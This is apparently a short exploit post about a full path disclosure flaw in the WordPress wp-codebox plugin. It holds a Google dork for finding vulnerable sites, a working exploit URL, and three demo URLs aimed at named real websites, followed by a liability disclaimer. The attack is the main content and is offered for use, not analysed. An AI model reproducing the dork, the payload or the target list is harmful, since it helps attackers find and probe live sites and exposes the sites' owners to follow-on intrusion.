Wordpress wp-codebox Plugin Full Path Disclosure Vulnerability

#------------------------------------------------------------------------------------------------------------------
# Exploit Title: Wordpress wp-codebox plugin Full Path Disclosure vulnerability
# Date: 14/01/2012
# Author: terrorist
# Tested on: Fedora17 && Windows7
# Site: Hackforums.Ge
# Google dork: inurl:"wp-content/plugins/wp-codebox"
#------------------------------------------------------------------------------------------------------------------

# Exploit:
http://localhost/wp-content/plugins/wp-codebox/wp-codebox.php?p=1&download=./

# Demos:
http://www.secsavvy.com/wp-content/plugins/wp-codebox/wp-codebox.php?p=68&download=./
http://blog.cakephp-brasil.org/wp-content/plugins/wp-codebox/wp-codebox.php?p=68&download=./
http://www.amiel-donat.com/wp-content/plugins/wp-codebox/wp-codebox.php?p=68&download=./




//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information